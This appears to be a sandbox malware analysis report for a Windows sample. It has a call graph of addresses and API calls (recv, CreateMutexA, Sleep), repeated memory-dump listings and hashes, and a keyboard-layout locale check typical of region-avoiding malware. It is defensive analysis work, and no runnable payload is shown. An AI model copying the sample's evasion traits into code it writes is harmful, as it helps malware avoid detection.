a8be0f InitOnceExecuteOnce 13063->13064 13065 a8b391 13064->13065 13066 a8b398 13065->13066 13067 aa6beb 4 API calls 13065->13067 13066->13047 13068 a8b3ce 13067->13068 13068->13047 13070 aa6bf7 __cftof 13069->13070 13071 aaa531 __cftof 4 API calls 13070->13071 13075 aa6bfc 13071->13075 13072 aa8aaf __cftof 4 API calls 13073 aa6c26 13072->13073 13074 aa6c35 13073->13074 13076 aa68bd 4 API calls 13073->13076 13074->13063 13075->13072 13077 aa6c5d ___free_lconv_mon 13076->13077 13077->13063 13217 a79a0c 13218 a79a1a 13217->13218 13222 a79a2e shared_ptr 13217->13222 13219 a7a847 13218->13219 13218->13222 13220 a7a883 Sleep CreateMutexA 13219->13220 13221 a7a8be 13220->13221 13223 a75b20 2 API calls 13222->13223 13224 a79aac 13223->13224 13225 a78a60 2 API calls 13224->13225 13226 a79abd 13225->13226 13227 a75b20 2 API calls 13226->13227 13228 a79be1 13227->13228 13229 a78a60 2 API calls 13228->13229 13230 a79bf2 13229->13230 13199 a79ad5 13200 a79ad7 13199->13200 13201 a75b20 2 API calls 13200->13201 13202 a79be1 13201->13202 13203 a78a60 2 API calls 13202->13203 13204 a79bf2 13203->13204 12755 aa6559 12756 aa63f7 __cftof 3 API calls 12755->12756 12757 aa656a 12756->12757 12762 a7b0d0 12763 a7b122 12762->12763 12764 a7b2dd CoInitialize 12763->12764 12765 a7b32a shared_ptr __floor_pentium4 12764->12765 13205 a72ad0 13206 a72adc 13205->13206 13207 a72ada 13205->13207 13208 a8c19a 5 API calls 13206->13208 13209 a72ae2 13208->13209 13254 a7ae50 13255 a7ae93 13254->13255 13266 aa6590 13255->13266 13260 aa656f 4 API calls 13261 a7aeb0 13260->13261 13262 aa656f 4 API calls 13261->13262 13263 a7aec8 __cftof 13262->13263 13272 a75500 13263->13272 13265 a7af7e shared_ptr __floor_pentium4 13267 aaa531 __cftof 4 API calls 13266->13267 13268 a7ae99 13267->13268 13269 aa656f 13268->13269 13270 aaa531 __cftof 4 API calls 13269->13270 13271 a7aea1 13270->13271 13271->13260 13273 a75520 13272->13273 13275 a75620 __floor_pentium4 13273->13275 13276 a72280 13273->13276 13275->13265 13279 a72240 13276->13279 13280 a72256 13279->13280 13283 aa8667 13280->13283 13286 aa7456 13283->13286 13285 a72264 13285->13273 13287 aa7496 13286->13287 13291 aa747e __cftof __floor_pentium4 13286->13291 13288 aa683a __cftof 4 API calls 13287->13288 13287->13291 13289 aa74ae 13288->13289 13292 aa7a11 13289->13292 13291->13285 13294 aa7a22 13292->13294 13293 aa7a31 __cftof 13293->13291 13294->13293 13299 aa7fb5 13294->13299 13304 aa7c0f 13294->13304 13309 aa7c35 13294->13309 13319 aa7d83 13294->13319 13300 aa7fbe 13299->13300 13301 aa7fc5 13299->13301 13328 aa799d 13300->13328 13301->13294 13303 aa7fc4 13303->13294 13305 aa7c18 13304->13305 13307 aa7c1f 13304->13307 13306 aa799d 4 API calls 13305->13306 13308 aa7c1e 13306->13308 13307->13294 13308->13294 13311 aa7c56 __cftof 13309->13311 13312 aa7c3c 13309->13312 13310 aa7db6 13317 aa7dc4 13310->13317 13318 aa7dd8 13310->13318 13336 aa808e 13310->13336 13311->13294 13312->13310 13312->13311 13314 aa7def 13312->13314 13312->13317 13314->13318 13332 aa81dd 13314->13332 13317->13318 13340 aa8537 13317->13340 13318->13294 13320 aa7db6 13319->13320 13321 aa7d9c 13319->13321 13322 aa808e 4 API calls 13320->13322 13326 aa7dc4 13320->13326 13327 aa7dd8 13320->13327 13321->13320 13323 aa7def 13321->13323 13321->13326 13322->13326 13324 aa81dd 4 API calls 13323->13324 13323->13327 13324->13326 13325 aa8537 4 API calls 13325->13327 13326->13325 13326->13327 13327->13294 13329 aa79af 13328->13329 13330 aa8979 4 API calls 13329->13330 13331 aa79d2 13330->13331 13331->13303 13333 aa81f8 13332->13333 13334 aa822a 13333->13334 13344 aac65f 13333->13344 13334->13317 13337 aa80a7 13336->13337 13351 aad199 13337->13351 13339 aa815a 13339->13317 13341 aa85aa __floor_pentium4 13340->13341 13343 aa8554 13340->13343 13341->13318 13342 aac65f __cftof 4 API calls 13342->13343 13343->13341 13343->13342 13347 aac504 13344->13347 13346 aac677 13346->13334 13348 aac514 13347->13348 13349 aa683a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13348->13349 13350 aac519 __cftof 13348->13350 13349->13350 13350->13346 13352 aad1bf 13351->13352 13363 aad1a9 __cftof 13351->13363 13353 aad256 13352->13353 13354 aad25b 13352->13354 13352->13363 13356 aad27f 13353->13356 13357 aad2b5 13353->13357 13364 aac9b0 13354->13364 13358 aad29d 13356->13358 13359 aad284 13356->13359 13381 aaccc9 13357->13381 13377 aaceb3 13358->13377 13370 aad00f 13359->13370 13363->13339 13365 aac9c2 13364->13365 13366 aa683a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13365->13366 13367 aac9d6 13366->13367 13368 aaccc9 GetPEB ExitProcess GetPEB RtlAllocateHeap 13367->13368 13369 aac9de __alldvrm __cftof _strrchr 13367->13369 13368->13369 13369->13363 13372 aad03d 13370->13372 13371 aad0af 13373 aacd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 13371->13373 13372->13371 13374 aad088 13372->13374 13376 aad076 13372->13376 13373->13376 13375 aacf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 13374->13375 13375->13376 13376->13363 13378 aacee0 13377->13378 13379 aacf1f 13378->13379 13380 aacf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 13378->13380 13379->13363 13380->13379 13382 aacce1 13381->13382 13383 aacd46 13382->13383 13384 aacd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 13382->13384 13383->13363 13384->13383 13444 a7dfd0 recv 13445 a7e032 recv 13444->13445 13446 a7e067 recv 13445->13446 13447 a7e0a1 13446->13447 13448 a7e1c3 __floor_pentium4 13447->13448 13449 a8c5dc GetSystemTimePreciseAsFileTime 13447->13449 13450 a7e1fe 13449->13450 13451 a8c19a 5 API calls 13450->13451 13452 a7e268 13451->13452 13545 a72b50 13546 a72b8e 13545->13546 13547 a8b72b TpReleaseWork 13546->13547 13548 a72b9b shared_ptr __floor_pentium4 13547->13548 13549 a73f5f 13550 a73f6d 13549->13550 13552 a73f76 13549->13552 13551 a723d0 5 API calls 13550->13551 13551->13552 13136 a7211a 13137 a8c62c InitializeCriticalSectionEx 13136->13137 13138 a72124 13137->13138

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00AA645B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,00AA645A,?,?,?,?,?,00AA74AE), ref: 00AA6497
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                    • Opcode ID: 96f8809e35bcbbbcbca5943e605120f47f810dd0b8f7b8fc52dc76d5d0871d95
                                                                                                                                                                                                                                                    • Instruction ID: e98ed867c42fc30ac8f1bb0264f20c58e1883b7981f54bd810f0ce49fd0de1ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96f8809e35bcbbbcbca5943e605120f47f810dd0b8f7b8fc52dc76d5d0871d95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64E086311407086FCF267B24DA0CD593B59EB56344F485800F81447161CB36DD91CD91
                                                                                                                                                                                                                                                    Function 053E0CD1 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1734765433.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_53e0000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: v{MK
                                                                                                                                                                                                                                                    • API String ID: 0-2473397949
                                                                                                                                                                                                                                                    • Opcode ID: 63a70718954f2426fa3d38de3caa70414cb5e33a43a4a49781ca22067699f95c
                                                                                                                                                                                                                                                    • Instruction ID: 999acb2d60ad5e1e955fe8e5c6a112cbfb91c7c95e36c03c265f728e2a78121f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63a70718954f2426fa3d38de3caa70414cb5e33a43a4a49781ca22067699f95c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD11C9EF288221BDB056C1856B18AF7A7AFE5C2670330C436F843D5946E6D85E4D2231
                                                                                                                                                                                                                                                    Function 00A75B20 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                    • API String ID: 0-3963862150
                                                                                                                                                                                                                                                    • Opcode ID: 484acec8d11f4ec409e351b7d151cf52a26d1ea08777b0a69b4d067622784d17
                                                                                                                                                                                                                                                    • Instruction ID: efc5e96d77c9eea9dc5b72dd4baf6a59a72e13676ec2f4423ca03f14c419ee01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 484acec8d11f4ec409e351b7d151cf52a26d1ea08777b0a69b4d067622784d17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7EF1D370900218AFEB24DF64CD89BDEB7B9EB44304F5085A9E519A72C1DBB49F84CF91
                                                                                                                                                                                                                                                    Function 00AAD6EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 185 aad6ef-aad6fa 186 aad708-aad70e 185->186 187 aad6fc-aad706 185->187 189 aad710-aad711 186->189 190 aad727-aad738 RtlAllocateHeap 186->190 187->186 188 aad73c-aad747 call aa7443 187->188 195 aad749-aad74b 188->195 189->190 191 aad73a 190->191 192 aad713-aad71a call aa9c81 190->192 191->195 192->188 198 aad71c-aad725 call aa8cf9 192->198 198->188 198->190
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AAA6D3,00000001,00000364,00000006,000000FF,?,00AAECFF,?,00000004,00000000,?,?), ref: 00AAD731
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
